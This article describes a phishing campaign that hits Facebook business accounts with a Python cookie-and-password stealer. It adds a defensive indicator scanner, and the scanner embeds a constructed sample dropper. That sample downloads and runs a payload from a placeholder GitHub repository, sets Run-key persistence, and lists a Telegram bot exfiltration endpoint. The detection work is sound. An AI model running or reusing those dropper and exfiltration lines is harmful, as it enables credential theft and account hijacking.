How hackers are targeting users
These messages contain a RAR/ZIP archive which includes a downloader for an evasive Python-based stealer. This file can steal cookies and passwords stored in the victim’s browser. Researchers have discovered that nearly one out of seventy targeted accounts is getting compromised and victimising users with massive financial losses. The report also includes screenshots to explain how these Facebook Messages work.
At first, hackers send phishing messages to Facebook business accounts. These messages either pretend to report copyright violations or request more information about a product. The attached archive includes a batch file that, if executed, can fetch a malware dropper from GitHub repositories to evade blocklists and minimise distinctive traces.
Apart from the payload (project.py), the batch script also fetches a standalone Python environment. This is required by the info-stealing malware, and the script adds persistence by setting the stealer to execute at system startup. The project.py file is wrapped in five layers of obfuscation that make it harder for AV engines to detect the threat.
This malware can collect the cookies and login data stored on the victim’s web browser into a ZIP archive named ‘Document.zip’. It then sends the stolen information to the attackers via Telegram or Discord bot API.
In the end, the stealer clears all cookies from the victim’s device to log them out of their accounts. This gives the scammers enough time to hijack the newly compromised account by changing the passwords.
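The chain described above (a batch dropper that pulls files from GitHub, a standalone Python runtime, startup persistence, browser data staged into Document.zip, and exfiltration through a Telegram or Discord bot API) leaves recognisable traces in scripts and in strings extracted from the payload. The following Python scanner is an added example written for this article; it is not Guardio's tooling or the campaign's code. The sample batch file and payload strings are constructed to mirror the behaviour the article describes, and every URL, user name, repository and token in them is a placeholder.

```python
import re

# Constructed sample of a batch dropper, modelled on the article's description:
# download from GitHub, fetch a standalone Python runtime, register startup persistence.
# Placeholder repository and file names; not the real campaign's script.
SAMPLE_BATCH = r"""
@echo off
curl -s -o %TEMP%\python.zip https://raw.githubusercontent.com/EXAMPLE-USER/EXAMPLE-REPO/main/python.zip
curl -s -o %TEMP%\project.py https://raw.githubusercontent.com/EXAMPLE-USER/EXAMPLE-REPO/main/project.py
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "%TEMP%\python\python.exe %TEMP%\project.py" /f
%TEMP%\python\python.exe %TEMP%\project.py
"""

# Constructed strings of the kind a `strings` pass over the final payload might show:
# browser profile paths, the staging archive name and a Telegram bot endpoint (placeholder token).
SAMPLE_PAYLOAD_STRINGS = "\n".join([
    r"C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"C:\Users\%USERNAME%\AppData\Local\Coc Coc\Browser\User Data\Default\Cookies",
    "Document.zip",
    "https://api.telegram.org/bot<BOT-TOKEN-PLACEHOLDER>/sendDocument",
])

# Each indicator maps a name to a regular expression; hostnames and paths are the
# public endpoints and standard browser profile locations, not campaign-specific IoCs.
INDICATORS = {
    "github_raw_download": re.compile(r"https?://raw\.githubusercontent\.com/", re.I),
    "standalone_python_runtime": re.compile(r"python\S*\.zip|python\.exe", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run\b", re.I),
    "startup_folder_persistence": re.compile(r"\\Start Menu\\Programs\\Startup", re.I),
    "browser_data_access": re.compile(r"\\User Data\\Default\\(Cookies|Login Data)|Coc ?Coc", re.I),
    "document_zip_staging": re.compile(r"Document\.zip", re.I),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "discord_api": re.compile(r"discord(app)?\.com/api/", re.I),
}


def find_indicators(text):
    """Return the sorted list of indicator names whose pattern matches the text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def risk_level(hits):
    """Combine indicators: an exfiltration channel together with staging or
    persistence is the full stealer pattern; several unrelated hits are worth a look."""
    hits = set(hits)
    exfil = {"telegram_bot_api", "discord_api"} & hits
    staging = {"document_zip_staging", "browser_data_access"} & hits
    persistence = {"run_key_persistence", "startup_folder_persistence"} & hits
    if exfil and (staging or persistence):
        return "high"
    if len(hits) >= 2:
        return "medium"
    if hits:
        return "low"
    return "none"


def assess(text):
    """Scan one script or string dump and return (risk, indicator names)."""
    hits = find_indicators(text)
    return risk_level(hits), hits


if __name__ == "__main__":
    for label, sample in (("batch dropper", SAMPLE_BATCH), ("payload strings", SAMPLE_PAYLOAD_STRINGS)):
        risk, hits = assess(sample)
        print(f"{label}: {risk} -> {', '.join(hits)}")
```

The dropper alone scores "medium" (download source, runtime and persistence, but no exfiltration endpoint yet), while the payload strings reach "high" because the Telegram bot endpoint appears alongside browser data paths and the Document.zip staging name. In practice the same patterns are more useful as hunting queries over endpoint telemetry (a process under a user's temp directory writing to a Run key, or a non-browser process contacting api.telegram.org) than as a static file scan, since the payload itself is obfuscated.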
It is important to note that social media companies take a while to respond to emails about hijacked accounts. This also offers cybercriminals more time to misuse the hacked accounts with fraudulent activities.
The scale of the campaign discovered by Guardio Labs is alarming: it is widespread and affects several regions. As per the report, nearly 100,000 phishing messages were sent every week, primarily to Facebook users in North America, Europe, Australia, Japan and Southeast Asia.
The report also notes that roughly 7% of all of Facebook's business accounts have been targeted. Of those, 0.4% downloaded the malicious archive. However, to be infected by the malware, the users still have to execute the batch file.
Guardio also attributed this campaign to Vietnamese hackers. The researchers found strings in the malware referencing the "Coc Coc" web browser, which is popular in Vietnam.